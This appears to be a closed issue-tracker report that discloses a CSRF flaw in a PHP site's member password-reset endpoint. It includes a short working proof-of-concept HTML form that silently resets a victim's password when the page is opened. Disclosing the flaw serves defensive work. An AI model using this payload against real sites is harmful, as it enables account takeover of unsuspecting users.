Closed
Description
The vulnerability occurs in
http://localhost/www/index.php?m=member&v=pw_reset
This is the interface of a common member to reset the password

The interface does not have CSRF protection, which causes ordinary members to change the login password without knowing their members when they open the Poc page.
poc:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
<input type="hidden" name="password" value="yuduo" />
<input type="hidden" name="password2" value="yuduo" />
<input type="hidden" name="submit" value="确 定" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Metadata
Metadata
Assignees
Labels
No labels
